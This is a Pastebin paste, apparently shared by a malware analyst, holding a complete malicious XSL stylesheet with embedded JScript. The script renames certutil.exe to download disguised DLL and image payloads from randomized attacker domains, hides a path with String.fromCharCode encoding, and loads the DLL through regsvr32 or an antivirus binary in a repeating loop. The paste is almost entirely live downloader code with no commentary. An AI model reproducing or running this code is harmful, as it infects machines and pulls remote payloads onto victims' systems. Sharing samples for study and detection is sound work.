Advertisement
dissectmalware

Mal xsl file

Sep 19th, 2018
476
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
XML 13.54 KB | None | 0 0
  1. <?xml version='1.0'?>
  2. <stylesheet
  3. xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
  4. xmlns:user="placeholder"
  5. version="1.0">
  6. <output method="text"/>
  7.     <ms:script implements-prefix="user" language="JScript">
  8.     <![CDATA[
  9.    
  10.    
  11.                    
  12.                                    
  13.    function Bxaki(url, file)
  14.    {
  15.         try
  16.         {      
  17.         xxWshShell.run("%temp%/certis.exe -urlcache -split -f "+url+" "+file,0,true);
  18.         return true;
  19.         }
  20.        catch (ex)
  21.         {      
  22.        return false;
  23.        }
  24.        
  25.    }
  26.    
  27.    
  28. function radador(min, max)
  29. {
  30.  return Math.round(Math.random()*(max-min)+min)
  31. }
  32.  
  33.  
  34.     var xLuciferxs;
  35.     var xCaverax;
  36.     var xVRXastaroth;
  37.     var xVRXastaroth2;
  38.     var ss1;
  39.     var stem1;
  40.     var stem2;
  41.     var stem3;
  42.     var stem4;
  43.     var pingadori;
  44.     var sVarRaz;
  45.     var sVarTEMRaz;
  46.     var sVarXEDRaz;
  47.     var smaeVar;
  48.     var raraiz;
  49.    xLuciferxs = false;
  50.    xCaverax = false;
  51.     var AppWshShell = new ActiveXObject("Scripting.FileSystemObject");
  52.     var WshShell = new ActiveXObject("WScript.Shell");
  53.     var sdjkhiwewsw = new ActiveXObject("WScript.Shell");
  54.     var kdcafex = new ActiveXObject("WScript.Shell");
  55.     var MaisShell = new ActiveXObject("WScript.Shell");
  56.     var xxWshShell = new ActiveXObject("WScript.Shell");
  57.     var masterAppData = new ActiveXObject("WScript.Shell");
  58.    var WSh = new ActiveXObject("WScript.Shell");
  59.     var ShA = new ActiveXObject("Shell.Application");  
  60.    
  61.  
  62.     try
  63.     {
  64.     AppWshShell.CopyFile("C:\\Windows\\System32\\certutil.exe",masterAppData.ExpandEnvironmentStrings("%temp%")+"\\certis.exe");
  65.     }
  66.    catch (ex)
  67.    {
  68.            
  69.     }      
  70.  
  71.     try
  72.     {
  73.     AppWshShell.CopyFile("C:\\Windows\\System32\\regsvr32.exe",sVarTEMRaz);
  74.     }
  75.    catch (ex)
  76.    {
  77.            
  78.     }  
  79.    
  80.    
  81.    
  82.    
  83. function vgos(min)
  84. {
  85.  
  86. xCaverax = false;
  87. smaeVar = "09/";
  88.  
  89.     pingadori = radador(1,7);
  90.     if (pingadori == 1)
  91.     {
  92.     xVRXastaroth = "http://ewwtw"+radador(1111111,9999999)+".justcheuty.com:"+radador(25000,25099)+"/"+smaeVar;
  93.     }
  94.     if (pingadori == 2)
  95.     {
  96.     xVRXastaroth = "http://exxxwrtw"+radador(1111111,9999999)+".kloudghtlp.com:"+radador(25000,25099)+"/"+smaeVar;
  97.     }
  98.  
  99.     if (pingadori == 3)
  100.     {
  101.     xVRXastaroth = "http://ewyytrtw"+radador(1111111,9999999)+".justchotlo.com:"+radador(25000,25099)+"/"+smaeVar;
  102.     }
  103.    
  104.     if (pingadori == 4)
  105.     {
  106.     xVRXastaroth = "http://ewyytrtw"+radador(1111111,9999999)+".justchtt.com:"+radador(25000,25099)+"/"+smaeVar;
  107.     }
  108.    
  109.     if (pingadori == 5)
  110.     {
  111.     xVRXastaroth = "http://ewyytrtw"+radador(1111111,9999999)+".navegador04890.com:"+radador(25000,25099)+"/"+smaeVar;
  112.     }
  113.    
  114.     if (pingadori == 6)
  115.     {
  116.     xVRXastaroth = "http://ewyytrtw"+radador(1111111,9999999)+".blackjoud.com:"+radador(25000,25099)+"/"+smaeVar;
  117.     }
  118.    
  119.     if (pingadori == 7)
  120.     {
  121.     xVRXastaroth = "http://ewyytrtw"+radador(1111111,9999999)+".justchttb.com:"+radador(25000,25099)+"/"+smaeVar;
  122.     }
  123.  
  124.  
  125.  
  126. xVRXastaroth2 = "http://ewrtw"+radador(1111111,9999999)+".lojadanetssx.website:"+radador(25000,25099)+"/"+smaeVar;
  127.  
  128.  
  129.  
  130. sVarRaz = "C:\\ProgramData\\tempa";
  131. sVarXEDRaz = "C:\\ProgramData\\xxx"+radador(1111111,9999999)+"xx";
  132. sVarTEMRaz = masterAppData.ExpandEnvironmentStrings("%temp%")+"\\regs"+radador(1111111,9999999)+".exe";
  133. raraiz = "undefined";
  134.  
  135.    
  136.  
  137.  
  138.     try
  139.     {
  140.     var fso = new ActiveXObject("Scripting.FileSystemObject");  
  141.     fso.CreateFolder(sVarRaz);  
  142.     }
  143.    catch (ex)
  144.    {
  145.        
  146.     }
  147.  
  148.     try
  149.     {
  150.     var fsosw = new ActiveXObject("Scripting.FileSystemObject");  
  151.     fsosw.CreateFolder(sVarXEDRaz);  
  152.     }
  153.    catch (ex)
  154.    {
  155.        
  156.     }
  157.  
  158.    
  159.        
  160.     try
  161.     {    
  162.      if (AppWshShell.FileExists(sVarRaz+"\\marxvxinhhm64.dll")){       
  163.        f = AppWshShell.GetFile(sVarRaz+"\\marxvxinhhm64.dll");     
  164.        if (f.size < 10 ){
  165.         f.Delete();  
  166.         f.Close();     
  167.        }
  168.     }  
  169.     }
  170.    catch (ex)
  171.    {
  172.        
  173.     }        
  174.  
  175.     try
  176.     {    
  177.      if (!AppWshShell.FileExists(sVarRaz+"\\0131vrxi.log")){       
  178.        f = AppWshShell.GetFile(sVarRaz+"\\marxvxinhhm64.dll");     
  179.         f.Delete();  
  180.         f.Close();     
  181.     }  
  182.     }
  183.    catch (ex)
  184.    {
  185.        
  186.     }    
  187.  
  188.  
  189.  
  190.     try
  191.     {    
  192.      if (!AppWshShell.FileExists(sVarRaz+"\\0131refor.log")){      
  193.        f = AppWshShell.GetFile(sVarRaz+"\\marxvxinhhm64.dll");     
  194.         f.Delete();  
  195.         f.Close();     
  196.     }  
  197.     }
  198.    catch (ex)
  199.    {
  200.        
  201.     }    
  202.  
  203.     stem1 = String.fromCharCode(67)+String.fromCharCode(58)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(80)+String.fromCharCode(114)+String.fromCharCode(111)+String.fromCharCode(103)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(32)+String.fromCharCode(70)+String.fromCharCode(105)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(115);
  204.     stem2 = String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(65)+String.fromCharCode(86)+String.fromCharCode(65)+String.fromCharCode(83)+String.fromCharCode(84)+String.fromCharCode(32)+String.fromCharCode(83)+String.fromCharCode(111)+String.fromCharCode(102)+String.fromCharCode(116)+String.fromCharCode(119)+String.fromCharCode(97)+String.fromCharCode(114)+String.fromCharCode(101)+String.fromCharCode(92)+String.fromCharCode(92);
  205.     stem3 = String.fromCharCode(65)+String.fromCharCode(118)+String.fromCharCode(97)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(97)+String.fromCharCode(115)+String.fromCharCode(119)+String.fromCharCode(82)+String.fromCharCode(117)+String.fromCharCode(110)+String.fromCharCode(68)+String.fromCharCode(108)+String.fromCharCode(108)+String.fromCharCode(46)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(101);
  206.    
  207.  
  208.        
  209.  
  210.       if (AppWshShell.FileExists(sVarRaz+"\\marxvxinhhmdwwn.gif")){
  211.        if (AppWshShell.FileExists(sVarRaz+"\\marxvxinhhme.jpg")){  
  212.         if (AppWshShell.FileExists(sVarRaz+"\\marxvxinhhmf.jpg")){ 
  213.          if (AppWshShell.FileExists(sVarRaz+"\\marxvxinhhmg.gif")){          
  214.            if (AppWshShell.FileExists(sVarRaz+"\\marxvxinhhmxa.gif")){       
  215.             if (AppWshShell.FileExists(sVarRaz+"\\marxvxinhhm64.dll")){
  216.  
  217.                 ss1 = "marxvxinhhm64.dll";
  218.                 if (AppWshShell.FileExists(stem1+stem2+stem3)){
  219.                   try
  220.                   {              
  221.                   xxWshShell.run('"'+stem1+stem2+stem3+'" "'+sVarRaz+"\\"+ss1+'"  /dasd /'+radador(0000001,999999999),0,true);     
  222.                  
  223.                   }
  224.                   catch (ex)
  225.                   {
  226.            
  227.                   }
  228.                
  229.                 }
  230.                
  231.                 if (!AppWshShell.FileExists(stem1+stem2+stem3)){   
  232.                   try
  233.                   {              
  234.                   xxWshShell.run('regsvr32.exe /s  "'+sVarRaz+"\\"+ss1+'"',0,true);        
  235.                  
  236.                   }
  237.                   catch (ex)
  238.                   {
  239.            
  240.                   }
  241.                
  242.                 }  
  243.              
  244.              xCaverax = true;              
  245.              
  246.              }
  247.             }
  248.           }
  249.         }
  250.         }
  251.        }
  252.      
  253.    
  254.  
  255.  
  256.  
  257. if (xCaverax == false)
  258.  {   
  259.  
  260.  
  261.     try
  262.     {
  263.      xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhma.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\\marxvxinhhma.jpg");
  264.     if (xLuciferxs == false) {
  265.        Bxaki(xVRXastaroth2+"marxvxinhhma.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\\marxvxinhhma.jpg");
  266.        }
  267.     }
  268.    catch (ex)
  269.    {
  270.            
  271.     }  
  272.  
  273.    
  274.  
  275.    
  276.     try
  277.     {
  278.      xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmb.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmb.jpg");
  279.        if (xLuciferxs == false) {  
  280.        Bxaki(xVRXastaroth2+"marxvxinhhmb.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmb.jpg");
  281.        }
  282.     }
  283.    catch (ex)
  284.    {
  285.            
  286.     }  
  287.  
  288.  
  289.    
  290.                                          
  291.    
  292.  
  293.     try
  294.     {
  295.      xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmc.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmc.jpg");
  296.        if (xLuciferxs == false) {  
  297.        Bxaki(xVRXastaroth2+"marxvxinhhmc.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmc.jpg");
  298.        }
  299.     }
  300.    catch (ex)
  301.    {
  302.            
  303.     }  
  304.  
  305.  
  306.    
  307.                                          
  308.    
  309.    
  310.  
  311.     try
  312.     {
  313.      xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmdwwn.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmdwwn.gif");
  314.        if (xLuciferxs == false) {    
  315.        Bxaki(xVRXastaroth2+"marxvxinhhmdwwn.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmdwwn.gif");
  316.        }
  317.     }
  318.    catch (ex)
  319.    {
  320.            
  321.     }
  322.  
  323.  
  324.    
  325.    
  326.  
  327.     try
  328.     {
  329.      xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmdx.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmdx.gif");
  330.        if (xLuciferxs == false) {    
  331.        Bxaki(xVRXastaroth2+"marxvxinhhmdx.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmdx.gif");
  332.        }
  333.     }
  334.    catch (ex)
  335.    {
  336.            
  337.     }
  338.  
  339.  
  340.    
  341.    
  342.  
  343.  
  344.     try
  345.     {
  346.      xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhme.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhme.jpg");
  347.        if (xLuciferxs == false) {    
  348.        Bxaki(xVRXastaroth2+"marxvxinhhme.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhme.jpg");
  349.        }
  350.     }
  351.    catch (ex)
  352.    {
  353.            
  354.     }  
  355.    
  356.  
  357.    
  358.  
  359.  
  360.     try
  361.     {
  362.      xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmf.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmf.jpg");
  363.        if (xLuciferxs == false) {    
  364.        Bxaki(xVRXastaroth2+"marxvxinhhmf.jpg.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmf.jpg");
  365.        }
  366.     }
  367.    catch (ex)
  368.    {
  369.            
  370.     }  
  371.  
  372.  
  373.  
  374.        
  375.  
  376.     try
  377.     {
  378.      xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmg.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmg.gif");
  379.        if (xLuciferxs == false) {        
  380.         Bxaki(xVRXastaroth2+"marxvxinhhmg.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmg.gif");
  381.        }
  382.     }
  383.    catch (ex)
  384.    {
  385.            
  386.     }
  387.  
  388.    
  389.    
  390.    
  391.  
  392.     try
  393.     {
  394.      xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmgx.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmgx.gif");
  395.        if (xLuciferxs == false) {        
  396.         Bxaki(xVRXastaroth2+"marxvxinhhmgx.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmgx.gif");
  397.        }
  398.     }
  399.    catch (ex)
  400.    {
  401.            
  402.     }
  403.  
  404.    
  405.  
  406.    
  407.    
  408.     try
  409.     {
  410.      xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmxa.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmxa.gif");
  411.        if (xLuciferxs == false) {    
  412.        Bxaki(xVRXastaroth2+"marxvxinhhmxa.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmxa.gif");
  413.        }
  414.     }
  415.    catch (ex)
  416.    {
  417.            
  418.     }  
  419.  
  420.  
  421.  
  422.    
  423.  
  424.     try
  425.     {
  426.      xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmxb.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmxb.gif");
  427.        if (xLuciferxs == false) {    
  428.        Bxaki(xVRXastaroth2+"marxvxinhhmxb.gif.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhmxb.gif");
  429.        }
  430.     }
  431.    catch (ex)
  432.    {
  433.            
  434.     }  
  435.  
  436.  
  437.  
  438.    
  439.  
  440.     try
  441.     {
  442.      xLuciferxs = Bxaki(xVRXastaroth+"r1.log",sVarRaz+"\\r1.log");
  443.         if (xLuciferxs == false) { 
  444.         Bxaki(xVRXastaroth2+"r1.log",sVarRaz+"\\r1.log");
  445.        }
  446.     }
  447.    catch (ex)
  448.    {
  449.            
  450.     }  
  451.    
  452.    
  453.                
  454.  
  455.     try
  456.     {
  457.      xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhm98.dll.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhm98.dll");
  458.         if (xLuciferxs == false) {
  459.         Bxaki(xVRXastaroth2+"marxvxinhhm98.dll.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhm98.dll");
  460.        }
  461.     }
  462.    catch (ex)
  463.      {
  464.            
  465.     }  
  466.    
  467.  
  468.     try
  469.     {
  470.      xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmhh.dll.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhm64.dll");
  471.         if (xLuciferxs == false) {
  472.         Bxaki(xVRXastaroth2+"marxvxinhhmhh.dll.zip?"+radador(0000001,999999999),sVarRaz+"\\marxvxinhhm64.dll");
  473.        }
  474.     }
  475.    catch (ex)
  476.      {
  477.            
  478.     }  
  479.    
  480.  
  481.    
  482.            
  483.     stem4 = sVarXEDRaz+"\\marxvxinhhm64"+radador(0000001,999999999)+".dll";            
  484.     if (! AppWshShell.FileExists(stem4)){
  485.     try
  486.     {
  487.      xLuciferxs = Bxaki(xVRXastaroth+"marxvxinhhmhh.dll.zip?"+radador(0000001,999999999),stem4);
  488.         if (xLuciferxs == false) {
  489.         Bxaki(xVRXastaroth2+"marxvxinhhmhh.dll.zip?"+radador(0000001,999999999),stem4);
  490.        }
  491.     }
  492.    catch (ex)
  493.      {
  494.            
  495.     }  
  496.    
  497.     }
  498.    
  499.            
  500.                    
  501.  
  502.    
  503.     xxWshShell.run('cmd /k echo %time% && timeout 5 > NUL && exit',0,true);
  504.  
  505.     if (AppWshShell.FileExists(stem4)){        
  506.  
  507.     ss1 = "marxvxinhhm64.dll";
  508.                 if (AppWshShell.FileExists(stem1+stem2+stem3)){
  509.                   try
  510.                   {              
  511.                   //xxWshShell.run(stem1+stem2+stem3+' "'+stem4+'" /kct'+radador(0000001,999999999),0,true);    
  512.                   ShA.ShellExecute(stem1+stem2+stem3,' "'+stem4+'" /kct'+radador(0000001,999999999), " ", "open", 0);                
  513.                  
  514.                   }
  515.                   catch (ex)
  516.                   {
  517.            
  518.                   }
  519.                
  520.                 }
  521.                
  522.                 if (!AppWshShell.FileExists(stem1+stem2+stem3)){   
  523.                   try
  524.                   {    
  525.                   //xxWshShell.run('regsvr32.exe /s "'+stem4+'"', 0,true);
  526.                   //ShA.ShellExecute("cmd", " /k "+sVarTEMRaz+' /s "'+stem4+'"', " ", "open", 0);                
  527.                   //ShA.ShellExecute("cmd", ' /k "regsvr32 /s "'+stem4+'"', " ", "open", 0);                 
  528.                   ShA.ShellExecute("regsvr32.exe", ' /s "'+stem4+'"', " ", "open", 1);               
  529.                  
  530.                  
  531.                   }
  532.                   catch (ex)
  533.                   {
  534.            
  535.                   }
  536.                
  537.                 }  
  538.     }
  539.    
  540.     ss1 = "marxvxinhhm64.dll"; 
  541.  
  542.    if (AppWshShell.FileExists(sVarRaz+"\\"+ss1)){
  543.            
  544.                 if (AppWshShell.FileExists(stem1+stem2+stem3)){
  545.                   try
  546.                   {              
  547.                   //xxWshShell.run('"'+stem1+stem2+stem3+'" "'+sVarRaz+"\\"+ss1+'" /kct'+radador(0000001,999999999),0,true);    
  548.                   ShA.ShellExecute(stem1+stem2+stem3,' "'+sVarRaz+"\\"+ss1+'" /kct'+radador(0000001,999999999), " ", "open", 0);                 
  549.                  
  550.                   }
  551.                   catch (ex)
  552.                   {
  553.            
  554.                   }
  555.                
  556.                 }
  557.                
  558.                 if (!AppWshShell.FileExists(stem1+stem2+stem3)){   
  559.                   try
  560.                   {              
  561.                   //xxWshShell.run('regsvr32.exe /s  "'+sVarRaz+"\\"+ss1+'"',0,true);
  562.                   ShA.ShellExecute("regsvr32.exe", ' /s "'+sVarRaz+"\\"+ss1+'"', " ", "open", 0);                    
  563.                  
  564.                   }
  565.                   catch (ex)
  566.                   {
  567.            
  568.                   }
  569.                
  570.                 }  
  571.                 }  
  572.    
  573.   }
  574.  
  575.  
  576.  
  577. xxWshShell.run('cmd /k echo %time% && timeout 4000 > NUL && exit',0,true);
  578. vgos(radador(0000001,999999999));
  579. }
  580.  
  581. xxWshShell.run('cmd /k echo %time% && timeout 5 > NUL && exit',0,true);
  582. vgos(radador(0000001,999999999));
  583.  
  584.  
  585.  
  586.    
  587.     ]]> </ms:script>
  588. </stylesheet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement